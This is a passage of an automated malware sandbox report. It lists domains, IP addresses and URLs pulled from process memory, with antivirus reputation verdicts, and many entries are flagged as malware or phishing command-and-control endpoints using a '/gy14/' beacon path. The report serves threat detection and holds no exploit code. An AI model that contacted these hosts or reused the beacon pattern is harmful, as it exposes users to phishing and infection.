              http://www.truedatalab.com0%VirustotalBrowse
              http://www.truedatalab.comReferer:0%Avira URL Cloudsafe
              http://www.mrbmed.comReferer:0%Avira URL Cloudsafe
              http://www.123bu6.shop100%Avira URL Cloudphishing
              http://www.123bu6.shop/gy14/www.theanhedonia.com100%Avira URL Cloudphishing
              http://www.sgyy3ej2dgwesb5.com/gy14/100%Avira URL Cloudmalware
              http://www.venitro.com/gy14/www.artbydianayorktownva.com100%Avira URL Cloudmalware
              http://www.ampsportss.com/gy14/100%Avira URL Cloudmalware
              http://www.theanhedonia.com/gy14/100%Avira URL Cloudmalware
              http://www.twinklethrive.com/gy14/www.ampsportss.com100%Avira URL Cloudmalware
              http://www.883831.comReferer:0%Avira URL Cloudsafe
              http://www.123bu6.shopReferer:0%Avira URL Cloudsafe
              http://www.roelofsen.online/gy14/100%Avira URL Cloudmalware
              http://www.mtdiyx.xyz100%Avira URL Cloudmalware
              http://www.venitro.com/gy14/100%Avira URL Cloudmalware
              http://www.ampsportss.com/gy14/www.sgyy3ej2dgwesb5.com100%Avira URL Cloudmalware
              http://www.twinklethrive.com/gy14/100%Avira URL Cloudmalware
              http://www.roelofsen.onlineReferer:0%Avira URL Cloudsafe
              http://www.artbydianayorktownva.com100%Avira URL Cloudmalware
              http://www.883831.com/gy14/www.venitro.com100%Avira URL Cloudmalware
              http://www.sgyy3ej2dgwesb5.com/gy14/www.883831.com100%Avira URL Cloudmalware
              http://www.sgyy3ej2dgwesb5.comReferer:0%Avira URL Cloudsafe
              http://www.soulheroes.online/gy14/www.roelofsen.online100%Avira URL Cloudmalware
              http://www.123bu6.shop/gy14/?Szu8Zp=FTAq1zBP6NNjQjBPydRh3L/j4TP0vWodDfrtqSKklHyFdw4ikOglIB/U9f3VYzUg75agPLVEuw==&3fzlqX=DtjxV100%Avira URL Cloudphishing
              http://www.ampsportss.com100%Avira URL Cloudmalware
              http://www.theanhedonia.com100%Avira URL Cloudphishing
              http://www.budgetnurseries.comReferer:0%Avira URL Cloudsafe
              http://www.budgetnurseries.com/gy14/100%Avira URL Cloudmalware
              http://www.whatsapp1.autos/gy14/100%Avira URL Cloudmalware
              http://www.roelofsen.online/gy14/www.truedatalab.com100%Avira URL Cloudmalware
              http://www.whatsapp1.autosReferer:0%Avira URL Cloudsafe
              http://www.artbydianayorktownva.com/gy14/100%Avira URL Cloudmalware
              http://www.budgetnurseries.com/gy14/www.mtdiyx.xyz100%Avira URL Cloudmalware
              http://www.soulheroes.online100%Avira URL Cloudmalware
              http://www.twinklethrive.comReferer:0%Avira URL Cloudsafe
              www.venitro.com/gy14/100%Avira URL Cloudmalware
              http://www.twinklethrive.com0%Avira URL Cloudsafe
              https://excel.office.com-0%Avira URL Cloudsafe
              http://www.elbt-ag.comReferer:0%Avira URL Cloudsafe
              http://www.elbt-ag.com/gy14/100%Avira URL Cloudmalware
              http://www.soulheroes.online/gy14/100%Avira URL Cloudmalware
              http://www.123bu6.shop/gy14/100%Avira URL Cloudphishing
              http://www.theanhedonia.com/gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs60bzmHjgtnYtuzz0MQ==&3fzlqX=DtjxV100%Avira URL Cloudmalware
              http://www.mtdiyx.xyz/gy14/www.elbt-ag.com100%Avira URL Cloudphishing
              http://www.theanhedonia.comReferer:0%Avira URL Cloudsafe
              http://www.truedatalab.com/gy14/100%Avira URL Cloudmalware

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.123bu6.shop
              		104.21.34.218
              		truetrueunknown
              www.theanhedonia.com
              		103.224.212.212
              		truetrueunknown
              www.truedatalab.com
              		0.0.0.0
              		truefalseunknown
              www.roelofsen.online
              		unknown
              		unknowntrueunknown
              www.soulheroes.online
              		unknown
              		unknowntrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.123bu6.shop/gy14/?Szu8Zp=FTAq1zBP6NNjQjBPydRh3L/j4TP0vWodDfrtqSKklHyFdw4ikOglIB/U9f3VYzUg75agPLVEuw==&3fzlqX=DtjxVtrue
              • Avira URL Cloud: phishing
              		unknown
              www.venitro.com/gy14/true
              • Avira URL Cloud: malware
              		low
              http://www.theanhedonia.com/gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs60bzmHjgtnYtuzz0MQ==&3fzlqX=DtjxVtrue
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.roelofsen.onlineexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://www.elbt-ag.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.soulheroes.onlineReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.mrbmed.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                		high
                https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngFexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3304893437.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    http://ww25.theanhedonia.com/gy14/?Szu8Zp=sJB9xXDMLUearYsOJfMPyoOL09k0Ht7qJDXT7Nexplorer.exe, 00000002.00000002.3315542504.00000000108AF000.00000004.80000000.00040000.00000000.sdmp, raserver.exe, 00000003.00000002.3301253402.0000000004DDF000.00000004.10000000.00040000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    https://word.office.comMexplorer.exe, 00000002.00000002.3309996442.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2073710031.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.theanhedonia.com/gy14/www.soulheroes.onlineexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • 9%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.883831.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.elbt-ag.com/gy14/www.twinklethrive.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.sgyy3ej2dgwesb5.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • 2%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.venitro.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://www.whatsapp1.autosexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      http://www.budgetnurseries.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.mtdiyx.xyz/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                      • 1%, Virustotal, Browse
                      • Avira URL Cloud: phishing
                      		unknown
                      https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://www.truedatalab.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.mrbmed.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.venitro.comReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.ampsportss.comReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.truedatalab.com/gy14/www.budgetnurseries.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.artbydianayorktownva.comReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.mtdiyx.xyzReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://wns.windows.com/eexplorer.exe, 00000002.00000003.2979324812.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3304893437.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075103317.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2066913018.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://www.mrbmed.com/gy14/www.whatsapp1.autosexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.truedatalab.comReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.mrbmed.comReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.2073710031.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            http://www.123bu6.shop/gy14/www.theanhedonia.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            		unknown
                            http://www.123bu6.shopexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            		unknown
                            http://www.sgyy3ej2dgwesb5.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000002.3302438018.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://www.venitro.com/gy14/www.artbydianayorktownva.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.ampsportss.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.theanhedonia.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.twinklethrive.com/gy14/www.ampsportss.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.883831.comReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.123bu6.shopReferer:explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.roelofsen.online/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://android.notify.windows.com/iOSexplorer.exe, 00000002.00000000.2073710031.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3309996442.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      https://outlook.comeexplorer.exe, 00000002.00000002.3309996442.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2073710031.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000002.00000000.2066913018.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.mtdiyx.xyzexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://www.venitro.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000002.00000002.3302866779.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2058382068.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3075332688.0000000007414000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000002.00000002.3304893437.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.msn.com/Iexplorer.exe, 00000002.00000002.3304893437.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2065986866.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.ampsportss.com/gy14/www.sgyy3ej2dgwesb5.comexplorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.twinklethrive.com/gy14/explorer.exe, 00000002.00000003.2980853080.000000000C40D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2979709469.000000000C39F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.2980259854.000000000C3FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3313011682.000000000C40F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
